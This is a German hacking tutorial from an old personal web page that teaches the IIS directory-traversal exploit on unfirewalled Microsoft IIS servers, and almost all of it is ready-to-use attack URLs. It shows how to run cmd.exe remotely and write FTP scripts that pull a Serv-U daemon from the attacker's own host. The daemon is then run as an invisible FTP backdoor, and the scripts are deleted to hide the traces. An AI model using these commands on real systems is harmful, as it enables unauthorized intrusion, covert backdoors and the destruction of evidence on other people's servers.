Site hosted by Angelfire.com: Build your free website today!

.::IIS-Hacking-Tutorial::.


Alle Befehle werden mit dem IE ausgeführt

Man benötigt:

-einen Tripod-account (oder einen anderen ftp mit root rechten) [kriegt ihr bei http://www.tripod.com ]

-Internet Explorer oder einen anderen Browser (ausser AOL-Browser, damit geht’s nicht, spreche aus eigener Erfahrung).

-Serv-U

-Fx Scanner

-eventuell einen Proxy (wenn ihr einen wollt, dann einen anonymus proxy, der Rest bringt es nicht)


So wenn ihr einen IIS gescannt habt, der keine Firewall hat (das ist wichtig), dann gebt ihr im browser folgendes ein:

http://ip des iis/den exploit/c+dir+festplatte des iis:\


das könnte dann so aussehen:

http://111.111.2.1/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir+c:\

dann müsstet ihr den Festplatteninhalt sehen können. Danach müsst ihr versuchen die cmd.exe zu kopieren

(ist wichtig für den echo befehl, aber das kommt später). Das macht ihr mit dem Befehl:

http://111.111.2.1/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+cmd2.exe

Wenn da jetzt ein CGI-Fehler kommt und darunter folgendes steht:

1 file(s) copied

dann habt ihr Glück. Den Server kann man wahrscheinlich hacken.

Dann müsst ihr gucken, ob ihr mit der cmd2.exe über die Festplatte des IIS browsen könnt. Das macht ihr mit dem

Befehl:

http://111.111.2.1/scripts/..%255c%255c../winnt/system32/cmd2.exe?/c+dir+c:\

wenn ihr jetzt den Festplatteninhalt seht, kann man den Server hacken.

Jetzt müsst ihr euch ein geeignetes Dir suchen oder erstellen, wo ihr später eure Scripts erstellt. Wenn ihr euch ein Dir erstellen wollt, dann mit dem Befehl:

http://111.111.2.1/scripts/..%255c%255c../winnt/system32/cmd2.exe?/c+mkdir+c:\euer dir\

Manchmal könnt ihr kein Dir erstellen, weil ihr keinen Access habt. Dann müsst ihr eure Scripts in einem Bereits

existierendem Dir erstellen.


Ich benutze in meinem Tutorial das Dir W3SVC1. In das Dir kommt ihr mit folgendem Befehl:

http://111.111.2.1/scripts/..%212c%212c../winnt/system32/cmd2.exe?/c+dir+c:\winnt\system32\logfiles\W3SVC1\

Jetzt solltet ihr euer Serv-U richtig konfigurieren, sprich Account Name, Passwort etc. einstellen. Dann müsst ihr

die ServUDaemon.ini und die ServUDaemon.exe auf euren Tripod hochladen. Und jetzt noch ein kleiner Tipp von mir:

Öffnet die ServUDaemon.ini mit dem Texteditor und schreibt unter [GLOBAL] : INVISIBLE=TRUE

Das sieht dann in der ini so aus:

[GLOBAL]

INVISIBLE=TRUE

...............

...............

Dann schließt ihr die ini und speichert die Änderung.

Wenn ihr jetzt alles hochgeladen habt, können wir anfangen die Scripts zu erstellen. Das macht ihr mit den echo Befehlen. Die gehen so:

Befehl 1)

http://111.111.2.1/scripts/..%212c..%212c../winnt/system32/cmd2.exe?/c+echo+open+ftp.tripod.com+21>>

c:\winnt\system32\logfiles\W3SVC1\ftpscr.txt

Befehl 2)

http://111.111.2.1/scripts/..%212c..%212c../winnt/system32/cmd2.exe?/c+echo+euer tripod name>>

c:\winnt\system32\logfiles\W3SVC1\ftpscr.txt

Befehl 3)

http://111.111.2.1/scripts/..%212c..%212c../winnt/system32/cmd2.exe?/c+echo+euer tripod Passwort>>

c:\winnt\system32\logfiles\W3SVC1\ftpscr.txt

Befehl 4)

http://111.111.2.1/scripts/..%212c..%212c../winnt/system32/cmd2.exe?/c+echo+Binary>>

c:\winnt\system32\logfiles\W3SVC1\ftpscr.txt

Befehl 5)

http://111.111.2.1/scripts/..%212c..%212c../winnt/system32/cmd2.exe?/c+echo+get+ServUDaemon.ini>>

c:\winnt\system32\logfiles\W3SVC1\ftpscr.txt

Befehl 6)

http://111.111.2.1/scripts/..%212c..%212c../winnt/system32/cmd2.exe?/c+echo+quit>>

c:\winnt\system32\logfiles\W3SVC1\ftpscr.txt


Das wäre dann das Script für die ServUDaemon.ini. Jetzt müsst ihr nur noch das Script für die ServUDaemon.exe

machen. Und das geht so:

Befehl 1)

http://111.111.2.1/scripts/..%212c..%212c../winnt/system32/cmd2.exe?/c+echo+open+ftp.tripod.com+21>>

c:\winnt\system32\logfiles\W3SVC1\ftpscr1.txt

Befehl 2)

http://111.111.2.1/scripts/..%212c..%212c../winnt/system32/cmd2.exe?/c+echo+euer tripod name>>

c:\winnt\system32\logfiles\W3SVC1\ftpscr1.txt

Befehl 3)

http://111.111.2.1/scripts/..%212c..%212c../winnt/system32/cmd2.exe?/c+echo+euer tripod Passwort>>

c:\winnt\system32\logfiles\W3SVC1\ftpscr1.txt

Befehl 4)

http://111.111.2.1/scripts/..%212c..%212c../winnt/system32/cmd2.exe?/c+echo+Binary>>

c:\winnt\system32\logfiles\W3SVC1\ftpscr1.txt

Befehl 5)

http://111.111.2.1/scripts/..%212c..%212c../winnt/system32/cmd2.exe?/c+echo+get+ServUDaemon.exe>>

c:\winnt\system32\logfiles\W3SVC1\ftpscr1.txt

Befehl 6)

http://111.111.2.1/scripts/..%212c..%212c../winnt/system32/cmd2.exe?/c+echo+quit>>

c:\winnt\system32\logfiles\W3SVC1\ftpscr1.txt


Okay das war’s dann mit den Scripts. Übrigens: Auf die groß und klein Schreibung der ServUDaemon.ini

und der ServUDaemon.exe solltet ihr unbedingt achten

Jetzt müsst ihr die Textdateien nur noch ausführen. Doch bevor ihr das macht, solltet ihr den

Inhalt der Textdateien auf Richtigkeit überprüfen. Das macht ihr mit dem Befehl:

http://111.111.2.1/scripts/..%212c..%212c../winnt/system32/cmd2.exe?/c+type+

c:\winnt\system32\logfiles\W3SVC1\ftpscr.txt


Wenn ihr jetzt die Textdatei ftpscr1.txt überprüfen wollt,

dann müsst ihr aus dem ftpscr.txt am Ende des Befehls, den Namen der zu überprüfenden Textdatei machen.

In unserem Fall wäre es ftpscr1.txt


So. Wenn alles mit den Textdateien stimmt, könnt ihr sie mit dem Befehl ausführen:

http://111.111.2.1/scripts/..%212c..%212c../winnt/system32/cmd2.exe?/c+ftp+-s:

c:\winnt\system32\logfiles\W3SVC1\ftpscr.txt


Das laden könnte nun etwas länger dauern (2 min oder länger wenn ihr Pech habt).

Wenn ihr nun die 2. Textdatei ausführen wollt, müsst ihr nach dem selben Prinzip verfahren,

wie ich es schon beim überprüfen der Textdateien erklärt habe.

Wenn ihr fertig seid mit den Befehlen, müsst ihr die Dateien in euren Ordner verschieben. Das geht mit dem Befehl:

http://111.111.2.1/scripts/..%212c..%212c../winnt/system32/cmd2.exe?/c+move+ServUDaemon.ini+

“c:\winnt\system32\logfiles\W3SVC1\“


Wenn es geklappt hat müsste da jetzt stehen:

CGI-ERROR (oder so was in der art)

1 file(s) moved (muss nicht immer in englisch sein, kann auch in französisch oder so sein)


Um jetzt die ServUDaemon.exe zu verschieben, müsst ihr aus ServUDaemon.ini ServUDaemon.exe machen.

Wenn die Dateien dann in eurem Ordner sind, müsst ihr die Textdateien löschen damit euch nachher keiner

am Arsch hat. Und zwar mit dem Befehl:

http://111.111.2.1/scripts/..%212c..%212c../winnt/system32/cmd2.exe?/c+del+

c:\winnt\system32\logfiles\W3SVC1\*.txt /q/f

So, das war’s. Jetzt müsst ihr nur noch die ServUDaemon.exe ausführen und dann ist der IIS gehacked.

Das ist der befehl dazu:

http://111.111.2.1/scripts/..%212c..%212c../winnt/system32/cmd2.exe?/c+

c:\winnt\system32\logfiles\W3SVC1\ServUDaemon.exe%20/h


So. Jetzt müsst ihr 20-30 Sekunden warten und dann auf abbrechen klicken.

Jetzt müsst ihr versuchen euch einzuloggen. Dazu braucht ihr einen ftp Klienten wie FlashFXP.

Dann gebt ihr die IP des IIS ein, euren Namen und euer Passwort, und los geht’s.

Wenn es nicht klappt sich einzuloggen, dann versucht den passive mode abzuschalten.

Wenn’s dann immer noch nicht geht, dann kann man den Server doch nicht hacken.


Jetzt könnt ihr noch mit Serv-U (ab Version 3.x) noch Fernadministrieren. Ihr könnt zum Beispiel einstellen,

wie oft man sich mit der selben IP einloggen darf, wie schnell man leechen darf oder ob ihr das

So viel Spaß beim lernen ;-),

euer Benni

© by Ben